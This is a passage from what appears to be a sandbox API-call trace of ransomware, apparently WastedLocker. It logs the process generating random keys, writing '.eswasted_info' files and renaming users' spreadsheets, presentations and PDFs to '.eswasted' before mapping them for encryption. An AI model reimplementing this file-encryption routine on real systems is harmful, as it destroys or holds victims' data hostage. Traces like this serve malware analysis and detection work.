szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.780] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.780] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.780] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.781] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.781] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.790] SetEndOfFile (hFile=0x124) returned 1 [0076.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.792] CloseHandle (hObject=0x124) returned 1 [0076.794] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0076.794] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.795] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.795] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\zjmVUQHRRU40fBau_.xlsx") returned 74 [0076.795] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x71ec18 [0076.795] lstrcpyW (in: lpString1=0x71ecac, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.795] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.795] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.796] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.796] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\zjmVUQHRRU40fBau_.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\zjmvuqhrru40fbau_.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.796] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.798] SetEndOfFile (hFile=0x124) returned 1 [0076.798] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.798] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.798] lstrcpyW (in: lpString1=0x71ecac, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\zjmVUQHRRU40fBau_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\zjmvuqhrru40fbau_.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\zjmVUQHRRU40fBau_.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\zjmvuqhrru40fbau_.xlsx.eswasted")) returned 1 [0076.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\zjmVUQHRRU40fBau_.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\zjmvuqhrru40fbau_.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.799] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0076.801] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.801] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.801] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.802] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.802] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.802] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.890] SetEndOfFile (hFile=0x124) returned 1 [0076.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.893] CloseHandle (hObject=0x124) returned 1 [0076.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0076.895] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.896] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.896] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q1PA4eFObKqF.xlsx") returned 61 [0076.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x6f5cc0 [0076.897] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0076.897] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.898] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0076.898] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q1PA4eFObKqF.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q1pa4efobkqf.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.899] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.900] SetEndOfFile (hFile=0x124) returned 1 [0076.900] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0076.900] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q1PA4eFObKqF.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q1pa4efobkqf.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q1PA4eFObKqF.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q1pa4efobkqf.xlsx.eswasted")) returned 1 [0076.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Q1PA4eFObKqF.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q1pa4efobkqf.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.901] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0076.903] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.904] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.905] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.905] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.906] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.906] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.963] SetEndOfFile (hFile=0x124) returned 1 [0076.965] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0076.965] CloseHandle (hObject=0x124) returned 1 [0076.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.968] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.969] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.969] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SP6D.pptx") returned 53 [0076.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x6f5cc0 [0076.969] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.969] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0076.969] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.970] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0076.970] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SP6D.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sp6d.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.971] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.972] SetEndOfFile (hFile=0x124) returned 1 [0076.972] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.972] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0076.972] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SP6D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sp6d.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SP6D.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sp6d.pptx.eswasted")) returned 1 [0076.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SP6D.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sp6d.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0076.973] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.974] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.975] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.975] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.975] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.975] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.976] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.984] SetEndOfFile (hFile=0x124) returned 1 [0076.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0076.986] CloseHandle (hObject=0x124) returned 1 [0076.988] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0076.988] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.989] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.989] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UA0Q3sb3DKOSWz.pptx") returned 63 [0076.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x6f5cc0 [0076.989] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0076.989] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.990] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0076.990] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UA0Q3sb3DKOSWz.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ua0q3sb3dkoswz.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.991] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.992] SetEndOfFile (hFile=0x124) returned 1 [0076.992] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0076.992] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UA0Q3sb3DKOSWz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ua0q3sb3dkoswz.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UA0Q3sb3DKOSWz.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ua0q3sb3dkoswz.pptx.eswasted")) returned 1 [0076.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UA0Q3sb3DKOSWz.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ua0q3sb3dkoswz.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.993] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0076.994] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.994] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.994] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.994] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.995] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.995] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.003] SetEndOfFile (hFile=0x124) returned 1 [0077.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.020] CloseHandle (hObject=0x124) returned 1 [0077.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.024] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.024] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.025] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UYok.ots") returned 52 [0077.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x6f5cc0 [0077.025] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.025] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.025] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.025] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UYok.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uyok.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.026] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.027] SetEndOfFile (hFile=0x124) returned 1 [0077.027] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.027] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UYok.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uyok.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UYok.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uyok.ots.eswasted")) returned 1 [0077.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UYok.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uyok.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0077.028] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0077.029] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0077.030] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0077.030] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.030] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0077.031] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0077.031] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.040] SetEndOfFile (hFile=0x124) returned 1 [0077.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.042] CloseHandle (hObject=0x124) returned 1 [0077.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0077.048] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0077.049] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0077.049] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y6fYgTB r.pdf") returned 57 [0077.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0077.049] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0077.049] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0077.050] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0077.050] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0077.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y6fYgTB r.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y6fygtb r.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.051] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.052] SetEndOfFile (hFile=0x124) returned 1 [0077.052] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.052] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0077.052] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y6fYgTB r.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y6fygtb r.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y6fYgTB r.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y6fygtb r.pdf.eswasted")) returned 1 [0077.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y6fYgTB r.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y6fygtb r.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.053] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, 